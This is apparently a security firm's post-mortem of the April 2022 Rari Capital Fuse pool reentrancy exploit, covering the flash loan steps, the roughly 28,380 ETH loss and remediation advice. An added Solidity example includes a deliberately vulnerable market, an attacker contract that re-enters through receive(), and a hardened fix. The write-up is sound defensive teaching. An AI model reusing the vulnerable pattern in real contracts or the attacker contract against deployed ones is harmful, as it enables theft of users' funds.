April 30, 2022
Loss Exceeds $80M Due to Reentrancy Vulnerability in Contract
On April 30, 2022, Beosin EagleEye detected that Fei Protocol's Rari Fuse pool had been exploited for about 28,380 ETH. The Beosin security team analyzed the incident; the findings are below.
Rari Capital describes itself as empowering individuals to break free by creating new opportunities, communities and financial products. Official website: https://rari.capital/
Multiple contracts were exploited; only one transaction is analyzed here.
1. The attacker first takes a flash loan from the Balancer Vault.
2. The attacker uses the flash-loaned funds as collateral to borrow from Rari Capital's Fuse pool. Because Rari Capital's cEther implementation contract pays out the borrowed ETH with call.value, which forwards all remaining gas to the recipient, the attacker's contract is called back in the middle of the borrow and re-enters the pool through the attack function it has prepared, draining all of the tokens held by the affected pool.
3. The attacker repays the flash loan and sends the profit to the 0xe39f contract.
The root cause of this attack is a reentrancy vulnerability in Rari Capital's cEther implementation contract.
As of this writing, the stolen funds are estimated at more than 28,380 ETH (approximately $80.34 million). Part of them is being deposited into Tornado Cash; the majority remains at the attacker's address.
In response to this incident, the Beosin security team recommends:
1. Use call.value with caution when transferring ETH. It forwards all remaining gas, so a contract recipient can call back into the protocol before the transferring function has finished. Record state changes before the transfer (checks-effects-interactions) and add a reentrancy guard so that reentrancy cannot occur.
2. Before a project goes live, have a professional security audit firm conduct a comprehensive security audit to reduce security risks.
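The following Solidity example is added here to illustrate the bug class and the first recommendation; it is not Rari Capital's or Fei Protocol's code and is not taken from the analyzed transaction. All contract and function names are hypothetical, and the toy market tracks only ETH collateral and ETH debt. `VulnerableMarket.borrow` sends ETH with a low-level call before recording the debt, `Attacker` re-enters from its `receive()` while its debt still reads zero, and `HardenedMarket` shows the same market with state updated before the transfer plus a mutex.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Added illustration, not Rari Capital's code; all names are hypothetical.
// `borrow` pays out ETH with a low-level call (the 0.8 spelling of
// `to.call.value(amount)("")`) BEFORE recording the borrower's debt, which is
// the ordering that lets a recipient contract re-enter while its debt is 0.
contract VulnerableMarket {
    mapping(address => uint256) public collateral; // wei posted as collateral
    mapping(address => uint256) public debt;       // wei borrowed

    // Liquidity from other lenders; this is what the attack drains.
    function supply() external payable {}

    function depositCollateral() external payable {
        collateral[msg.sender] += msg.value;
    }

    function borrow(uint256 amount) external {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralized");
        // INTERACTION first: `call` forwards all remaining gas (unlike `transfer`,
        // which forwards 2300), so a contract recipient runs code inside this borrow.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        // EFFECT last: the debt is only recorded after the callback has returned.
        debt[msg.sender] += amount;
    }

    function withdrawCollateral(uint256 amount) external {
        require(amount <= collateral[msg.sender], "too much");
        // Passes during the callback above because debt[msg.sender] is still 0.
        require(collateral[msg.sender] - amount >= debt[msg.sender], "undercollateralized");
        collateral[msg.sender] -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Deposits V as collateral, borrows V, and in the resulting callback withdraws
// the full V of collateral before the debt exists. Ends with 2V; the market is
// left with V of unbacked debt against the other suppliers' ETH.
contract Attacker {
    VulnerableMarket public immutable market;
    bool private reentered;

    constructor(VulnerableMarket m) { market = m; }

    function attack() external payable {
        market.depositCollateral{value: msg.value}();
        market.borrow(msg.value); // receive() below fires inside this call
    }

    receive() external payable {
        if (msg.sender == address(market) && !reentered) {
            reentered = true; // only re-enter once; later payouts are just accepted
            market.withdrawCollateral(market.collateral(address(this)));
        }
    }
}

// Hardened form: state is updated before any ETH leaves (checks-effects-
// interactions) AND a mutex rejects nested calls. The same sequence now
// reverts inside the callback ("reentrant"), which makes the outer borrow revert.
contract HardenedMarket {
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;
    uint256 private locked = 1;

    modifier nonReentrant() {
        require(locked == 1, "reentrant");
        locked = 2;
        _;
        locked = 1;
    }

    function supply() external payable {}

    function depositCollateral() external payable {
        collateral[msg.sender] += msg.value;
    }

    function borrow(uint256 amount) external nonReentrant {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralized");
        debt[msg.sender] += amount;                       // EFFECT
        (bool ok, ) = msg.sender.call{value: amount}(""); // INTERACTION
        require(ok, "transfer failed");
    }

    function withdrawCollateral(uint256 amount) external nonReentrant {
        require(amount <= collateral[msg.sender], "too much");
        require(collateral[msg.sender] - amount >= debt[msg.sender], "undercollateralized");
        collateral[msg.sender] -= amount;                 // EFFECT
        (bool ok, ) = msg.sender.call{value: amount}(""); // INTERACTION
        require(ok, "transfer failed");
    }
}
```

Even without the mutex, the reordering alone defeats this attacker: when `receive()` runs, `debt` already equals the borrowed amount, so `withdrawCollateral` fails its collateral check. The mutex is kept as defense in depth because it also covers paths that a later change might reorder by mistake.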
If you need any blockchain security services, please contact us: